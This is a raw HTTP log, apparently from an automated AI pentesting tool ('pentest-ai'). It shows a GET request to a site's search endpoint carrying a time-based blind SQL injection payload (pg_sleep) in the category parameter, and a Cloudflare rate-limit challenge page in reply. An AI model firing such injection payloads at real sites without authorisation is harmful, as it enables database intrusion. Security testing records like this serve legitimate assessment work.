REQUEST:
GET https://my.myfirst.tech/search?category=1%27%20%7C%7C%20pg_sleep%285%29%7C%7C%27
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9386
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8476dff10a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=SBpoh5mu9kFNRzctwZ06Vpign1RV4SvOCsrhYOSXbfLVhgHCIFTpE3k4Hm2B1EgNG1hwv%2FGFhkIb3pjaHUGNgNCxMvGlUngs%2F5580teBUCBmfSuGOrAsljuQQorQAY2qjPz2ceU%2BCHjDUYoQoQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8476dff10a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'dgXhkFS5f6y21k3Eyo4EnL_eYRBcalu7CcS8WIZCh6k-1784281161-1.2.1.1-uJt8IKAHf0y9rs.FSNK3uuH.kjYYUWQBqUdmdv3mSjJl8j_wM0g7.C3WhOZpu_zQ',cITimeS: '1784281161',cRay: 'a1c8476dff10a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?category=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_tk=uxHmbOuy9Y3.O1KAJDg1avwKojmw_GzCm6RcadRn6FE-1784281161-1.0.1.1-auZBNz53GY0iW3X7IRvEZ441LrXG8twrOno1.Qf1oxs",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?category=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_f_tk=uxHmbOuy9Y3.O1KAJDg1avwKojmw_GzCm6RcadRn6FE-1784281161-1.0.1.1-auZBNz53GY0iW3X7IRvEZ441LrXG8twrOno1.Qf1oxs",md: 'Hs30W8WQ2tuj.FWipMhIj_9ByAQF.jH9qWzpU81u2UI-1784281161-1.2.1.1-Es1AmxnymbwT5_2LNI1al6_oM.S4O2vmJNs7BY4GLbx0cs9CRcsPgs46uXcGt8a36DgYwmYKwVTFtRIJ6FkSzT_daexfoce7kRSAo9gCAJvesq07wcuKCD68.bS1HYd9SsNc8Fiu9sfrbT1DVUKBdBgJoXX5WsWprZLM85D23SiHeqnURAKTxXzQMdma4MPJ6GDwDnBJ9.R8xYDhMN9bMqW2rIqEPPYwD9bsc12ePDszf24HKPNTVVr4FCNVLZ1YRb88BDSO9yU3YeoORIoD96OAYhpklpjB9bM_eAhwigqZmV88H0D9LkSt8ZDccFBf8fh_einDUc6TD_fyw90Ry6R5sC_aPyEKnqHKz0EeanuTNCdbJWIzDo8EeCbP4i7.Z9kH9fBAMDvYqDG2EBE89_MN7wpnmaIZed6SiRHfirvDsm9Q8GBo2bfzb.BpN4s23iq1LnjmM_5EC0Bd9_OwVcopVbfX_zRuZ5WDjDtRypqGj6M3rHrZZzmIHLOiJSEYOAtqyH.untqzyqftkOzVgGgGrPApn62poYd.fHfCAonTyhazjSBYCr6x_jmMCsErXeRqyMG5IaCAxvIrHu3DGr.u_NAykU5Y5vv0wJZw52HL6lVU00.sdCAB_9wtligXcqHnUQLa1kkItgiHMipMHJIKc33r8vPz7_RMtjuesu8NE310s22siUgBbE.IaCebnlz4WPKc4w8lVeLi_7mQ65pV9POzYBY8SqtCZIs_Pc3PDG7RRxOb_IBVZ8UYoLOaoj5vUi_iuYQ0YzmtuZAmUhqPQGderIZbc_cEsXq6Qq_RJ550UnHNjtCghPZNzua7rba9EpGhxFpGsodzmvM3CQkOK5lzz_5bWxI.TUyGY4QjWCoVgoGmpZnUz5XRFyVRfcom4JtpMEjO_rHLRySA_hj8MCl35bJJ7T5XmvrU9C_FPqjtRkiG2Y39FEioKgnMv9nQJWIl571W.Tlk_Zv3WDBH1Dib1tW1M1UzqGynWUc7DPz.1LyPPbhHDnaFPXDzwPCzCElMEAtu3Joij56iMSUHiVGhm2C9UGK_aNnQJEW6b_I5KXaoRt4YMZyec9BqP4lSQo32EQ11AErm8pcjCcijmguMmiGglbC8J6uRuqPfFzYNdoAbO5I3VOhWa7WQoHMklgXI1GTlTPUKSax9upOHh94eIvfgD1ArFQJOFXn7.XBQf1OHtTyxF8svhSJq',mdrd: 'Mxf6SXoMPBpi80leVQQtZq_neqFWEqNzpnudkiL3mFw-1784281161-1.2.1.1-YbuWMzzgxgmNtocHFVp163FkthuHDRXWKb69UMQercmyj_w7ToX_chxy.uAFdbU3vGOYFB0bPoH_szOqJSfZrktV3LtuywxEHRx3jKRjW1Uhe1RumGL_m0snPikQ6KaxWjDrqOU4Ifms.nzCvJ.8nWHHkJgtdeezDgssgIn4dTICD7uHFdmPBLunz3U9WQulrZ2kM_Cb7Zo0CJ4T8lZtREGohgVXbBXPHBKp_5TJ9nyIcArow8gBFU.W1RmvZInO',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8476dff10a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?category=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_rt_tk=uxHmbOuy9Y3.O1KAJDg1avwKojmw_GzCm6RcadRn6FE-1784281161-1.0.1.1-auZBNz53GY0iW3X7IRvEZ441LrXG8twrOno1.Qf1oxs"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
